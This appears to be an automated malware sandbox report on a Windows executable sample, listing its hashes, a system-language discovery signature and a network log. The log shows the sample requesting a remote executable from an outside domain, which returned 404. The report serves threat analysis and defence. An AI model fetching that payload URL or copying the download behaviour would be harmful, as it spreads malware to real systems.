Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12/08/2024, 10:46 UTC
Static task
static1
Behavioral task
behavioral1
Sample
8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exe
-
Size
486KB
-
MD5
8e717852f44026ab8db4f15fa599b25b
-
SHA1
51e2f4bbb759f1d7842c115de700393b2ff1f938
-
SHA256
81a5281ff3903c4ac763706125dc3c4dcfe8103b47585d25b11e2bc1774a9218
-
SHA512
7981727f6b9cfc47c18648e9996ae03c73abc9c481d5988e69c61c6262fa1f83f8466fbb5ab175b7c2103944467562e4a065ed2973c8b80aca7c2df8b626eb9a
-
SSDEEP
12288:hBvbS8G0hWgODlx8/c9Vf44gisD7dzW1H:DeshWvZx8uVQwsD7lW
Malware Config
Signatures
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exe
Processes
Network
-
Remote address:8.8.8.8:53Requestwww.automaticyaran.comIN AResponsewww.automaticyaran.comIN A212.33.206.82
-
GEThttp://www.automaticyaran.com/e107/plugins/wab.exe8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exeRemote address:212.33.206.82:80RequestGET /e107/plugins/wab.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: www.automaticyaran.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
set-cookie: d_user_session=ed1821fa8ce35b916ede5a85653b5d16a720f73d3ad94c414f845c7fd23840d57f27dfd5f31c3beded3c9d7df13449cfab523349b4049ecfd7ebfbcd6e3b5d17; path=/
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://yaran.co/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 305_HTTP.404,305_404,305_URL.9dbe297755a86d00704dea1aaba6ace2,305_
x-litespeed-cache: miss
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
date: Mon, 12 Aug 2024 10:46:48 GMT
server: LiteSpeed
connection: Keep-Alive
-
212.33.206.82:80http://www.automaticyaran.com/e107/plugins/wab.exehttp8e717852f44026ab8db4f15fa599b25b_JaffaCakes118.exe1.2kB 25.7kB 19 21
HTTP Request
GET http://www.automaticyaran.com/e107/plugins/wab.exeHTTP Response
404